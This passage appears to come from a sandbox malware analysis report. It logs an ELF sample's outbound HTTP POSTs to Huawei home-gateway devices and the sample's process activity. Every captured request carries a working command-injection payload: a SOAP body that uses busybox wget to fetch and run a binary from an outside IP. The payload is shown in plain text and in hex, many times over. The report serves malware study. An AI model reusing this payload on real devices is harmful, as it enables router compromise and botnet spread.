                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            140192.168.2.143688041.39.58.19437215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.675818920 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            141192.168.2.145840641.96.223.15237215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.675847054 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            142192.168.2.1447258156.53.22.937215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.675864935 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            143192.168.2.143428841.25.194.15737215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.675898075 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            144192.168.2.144654241.104.63.20437215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.675926924 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            145192.168.2.1435868156.95.138.2037215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.675960064 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            146192.168.2.1437366156.121.47.7737215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.676028967 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            147192.168.2.1445454156.214.90.25237215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.676064968 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            148192.168.2.1459352156.150.23.16737215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.676103115 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            149192.168.2.1454480156.122.69.21437215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.676115036 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            System Behavior

                                            Start time (UTC):08:43:32
                                            Start date (UTC):14/06/2024
                                            Path:/tmp/hj3msRLZgi.elf
                                            Arguments:/tmp/hj3msRLZgi.elf
                                            File size:115622 bytes
                                            MD5 hash:e934abd4bf5004524b803aaf44a23dee

                                            Start time (UTC):08:43:33
                                            Start date (UTC):14/06/2024
                                            Path:/tmp/hj3msRLZgi.elf
                                            Arguments:-
                                            File size:115622 bytes
                                            MD5 hash:e934abd4bf5004524b803aaf44a23dee

                                            Start time (UTC):08:43:33
                                            Start date (UTC):14/06/2024
                                            Path:/tmp/hj3msRLZgi.elf
                                            Arguments:-
                                            File size:115622 bytes
                                            MD5 hash:e934abd4bf5004524b803aaf44a23dee
                                            Start time (UTC):08:43:33
                                            Start date (UTC):14/06/2024
                                            Path:/tmp/hj3msRLZgi.elf
                                            Arguments:-
                                            File size:115622 bytes
                                            MD5 hash:e934abd4bf5004524b803aaf44a23dee

                                            Start time (UTC):08:43:33
                                            Start date (UTC):14/06/2024
                                            Path:/tmp/hj3msRLZgi.elf
                                            Arguments:-
                                            File size:115622 bytes
                                            MD5 hash:e934abd4bf5004524b803aaf44a23dee

                                            Start time (UTC):08:43:33
                                            Start date (UTC):14/06/2024
